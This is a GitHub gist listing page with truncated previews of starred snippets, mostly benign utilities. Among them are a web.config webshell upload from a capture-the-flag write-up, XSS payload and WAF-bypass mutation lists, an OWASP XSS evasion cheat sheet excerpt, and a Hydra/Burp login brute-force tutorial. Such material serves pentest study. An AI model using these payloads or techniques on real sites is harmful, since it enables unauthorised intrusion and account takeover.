Skip to content

Instantly share code, notes, and snippets.

View MrPurplz's full-sized avatar

MrPurplz

4 followers · 2 following
View GitHub Profile
@djrtwo
djrtwo / count_bytes.py
Created August 9, 2017 18:47
Count zero and non-zero bytes in hex string
txdata = "606060405260405160808061067283398101604090815281516020830151918301516060909301519092905b42811161003457fe5b60008054600181016100468382610100565b916000526020600020900160005b8154600160a060020a038089166101009390930a928302920219161790555060008054600181016100858382610100565b916000526020600020900160005b8154600160a060020a038088166101009390930a928302920219161790555060008054600181016100c48382610100565b916000526020600020900160005b8154600160a060020a038087166101009390930a928302920219161790555060028190555b5050505061014b565b8154818355818115116101245760008381526020902061012491810190830161012a565b5b505050565b61014891905b808211156101445760008155600101610130565b5090565b90565b6105188061015a6000396000f300606060405236156100a15763ffffffff7c0100000000000000000000000000000000000000000000000000000000600035041663120b205381146100a35780634ecb35c4146100c557806366d003ac146100f557806367e404ce146101215780636cc6cde11461014d5780637022b58e1461017957806393c0e83a1461018b578063a79a3cee146101ba578063ac4c25b2146101de578063c7fe23a3146101f057
@Ge0rg3
Ge0rg3 / web.config
Last active August 9, 2019 15:27
Written for my Bounty HTB Write-up. Bodged together from other areas of the internet (most notably https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.asp & https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/).
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
@ethicalhack3r
ethicalhack3r / events.txt
Last active March 3, 2023 07:41
List of event attributes
loadedstart
onabort
onafterprint
onanimationend
onanimationiteration
onanimationstart
onautocomplete
onautocompleteerror
onbeforecopy
onbeforecut
@hackerscrolls
hackerscrolls / mutation_a.txt
Last active March 11, 2023 15:19
Mutation points in <a> tag for WAF bypass
<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">
[1]
Bytes:
\x09 \x0a \x0c \x0d \x20 \x2f
<a/href="javascript:alert(1)">
<a\x09href="javascript:alert(1)">
[2,3]
@wido
wido / random-ipv6-addr.py
Last active May 31, 2023 18:43
Generate a random IPv6 address
#!/usr/bin/env python3
"""
Generate a random IPv6 address for a specified subnet
"""
from random import seed, getrandbits
from ipaddress import IPv6Network, IPv6Address
subnet = '2001:db8:100::/64'
@intrd
intrd / tutorial_bruteforce_cookies_csrf_burp_rewrite.txt
Last active June 27, 2023 15:57
Tutorial - Extract session and csrf using cURL, run Hydra/Patator bruteforce over Burpsuite proxy w/ rewritting macros
## Extract session and csrf using cURL, run Hydra/Patator bruteforce over Burpsuite proxy w/ rewritting macros
# @author intrd - http://dann.com.br/ (thx to g0tmi1k)
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
## Burp csrf-rewritting macro
- Session handling rules = new macro, tick Tolerate URL mismatch when matching parameters..
Create a macro rule over method GET, extract custom parameter w/ parameter name = _csrf
and extract start after expression value=" and end at delimiter ", configure scope for domain and enable for Proxy,
Open session tracker to test. (on Intruder bruteforce, u need to untick Make unmodified baseline request).
- Proxy options = Enable Cookie jar for proxy, if not working, enable invisible proxing
@PaulFurtado
PaulFurtado / usb_reset.py
Last active August 9, 2023 13:46
Reset USB device from python
"""
Example code for resetting the USB port that a Teensy microcontroller is
attached to. There are a lot of situations where a Teensy or Arduino can
end up in a bad state and need resetting, this code is useful for
"""
import os
import fcntl
import subprocess
@wenzhixin
wenzhixin / ubuntu14.04-command-line-install-android-sdk
Last active January 16, 2024 21:15
Ubuntu 14.04 command line install android sdk
# install openjdk
sudo apt-get install openjdk-7-jdk
# download android sdk
wget http://dl.google.com/android/android-sdk_r24.2-linux.tgz
tar -xvf android-sdk_r24.2-linux.tgz
cd android-sdk-linux/tools
# install all sdk packages
@sseffa
sseffa / xss-owasp-cheatsheet
Created April 18, 2014 08:16
xss-owasp-cheatsheet
#
# https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
# based on the RSnake original http://ha.ckers.org/xss.html
# Retrieved on 2013-11-20
# Much of this wildly obsolete
#
# XSS Locator 2
'';!--"<XSS>=&{()}
@xvitaly
xvitaly / remove_crw.cmd
Last active March 16, 2024 16:12
Remove telemetry updates for Windows 7 and 8.1
@echo off
echo Uninstalling KB3075249 (telemetry for Win7/8.1)
start /w wusa.exe /uninstall /kb:3075249 /quiet /norestart
echo Uninstalling KB3080149 (telemetry for Win7/8.1)
start /w wusa.exe /uninstall /kb:3080149 /quiet /norestart
echo Uninstalling KB3021917 (telemetry for Win7)
start /w wusa.exe /uninstall /kb:3021917 /quiet /norestart
echo Uninstalling KB3022345 (telemetry)
start /w wusa.exe /uninstall /kb:3022345 /quiet /norestart
echo Uninstalling KB3068708 (telemetry)